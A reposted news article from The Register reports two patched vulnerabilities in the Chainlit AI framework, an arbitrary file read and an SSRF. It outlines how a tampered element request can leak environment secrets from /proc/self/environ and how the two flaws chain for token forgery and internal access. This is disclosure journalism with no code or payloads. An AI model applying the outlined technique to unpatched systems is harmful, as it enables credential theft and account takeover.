Speech & Audio

AI framework flaws put enterprise clouds at risk of takeover • The Register

AI framework flaws put enterprise clouds at risk of takeover • The Register


Two “easy-to-exploit” vulnerabilities in the popular open-source AI framework Chainlit put major enterprises’ cloud environments at risk of leaking data or even full takeover, according to cyber-threat exposure startup Zafran.

Chainlit is a Python package that organizations can use to build production-ready AI chatbots and applications. Corporations can either use Chainlit’s built-in UI and backend, or create their own frontend on top of Chainlit’s backend. It also integrates with other tools and platforms including LangChain, OpenAI, Bedrock, and LlamaIndex, and supports authentication and cloud deployment options.

It’s downloaded about 700,000 times every month and saw 5 million downloads last year.

The two vulnerabilities are CVE-2026-22218, which allows arbitrary file read, and CVE-2026-22219, which can lead to server-side request forgery (SSRF) attacks on the servers hosting AI applications.

While Zafran didn’t see any indications of in-the-wild exploitation, “the internet-facing applications we observed belonged to the financial services and energy sectors, and universities are also using this framework,” CTO Ben Seri told The Register.

Zafran disclosed the bugs to the project’s maintainers in November, and a month later, Chainlit released a patched version (2.9.4) that fixes the flaws. So if you use Chainlit, make sure to update the framework to the fixed release. 

Arbitrary file read

The arbitrary file read flaw, CVE-2026-22218, has to do with how the framework handles elements – these are pieces of content, such as a file or image, that can be attached to a message. It can be triggered by sending a malicious update element request with a tampered custom element, and abused to exfiltrate environment variables by reading /proc/self/environ. 

“These variables often contain highly sensitive values that the system and enterprise depend on, including API keys, credentials, internal file paths, internal IPs, and ports,” according to Zafran’s analysis, shared with The Register ahead of publication. “This is mostly dangerous in AI systems where the servers have access to internal data of the company to provide a tailored chatbot experience to their users.” 

In environments where authentication is enabled, attackers can steal secrets used to sign authentication tokens (CHAINLIT_AUTH_SECRET). These secrets, when combined with user identifiers – leaked from databases or inferred from organization emails – can be abused to forge authentication tokens and fully take over users’ Chainlit accounts.

Other environment variables up for grabs may include cloud credentials – such as AWS_SECRET_KEY – that Chainlit requires for cloud storage, along with sensitive API keys or the addresses and names of internal services.

Plus, an attacker can probe these addresses using the second SSRF vulnerability to access sensitive data from internal REST APIs. 

Server-side request forgery

Zafran found the SSRF vulnerability, CVE-2026-22219, in the SQLAlchemy data layer. This one is triggered in the same way as the arbitrary file read – via a tampered custom element. Then, the attacker can retrieve the copied file by extracting the element’s “chainlit key” property from the metadata, download the file to an attacker-controlled computer, and query the file to access conversation history.

According to Seri, the vulnerabilities are “easy to exploit,” and can be combined in multiple ways to leak sensitive data, escalate privileges, and move laterally within the system.

“An attacker only needs to send a simple command and change one value to point to the file or URL they want to access,” he said. 

“Regarding how the vulnerabilities can be combined, SSRF typically requires knowledge of the server environment,” Seri added. “By leveraging the read-file vulnerability to leak that information, such as environment details or internal addresses, it becomes much easier to successfully carry out the SSRF attack.”

Companies increasingly use AI frameworks to build their own AI chatbots and apps, and Seri acknowledges that organizations are “working under very tight timelines to deliver fully functioning AI systems that integrate with highly sensitive data.”

Using third-party frameworks and open-source code allows development teams to move fast – and it introduces new risks to the environment.

“The risk is not the use of third-party code by itself, but the combination of rapid integration, limited understanding of the added code, and reliance on external maintainers for security and code quality,” Seri said. “As a result, organizations end up deploying backend servers that communicate with clients, cloud resources, and LLMs, creating multiple entry points where vulnerabilities can emerge and put the system at risk.” ®

AI framework flaws put enterprise clouds at risk of takeover • The Register

Source link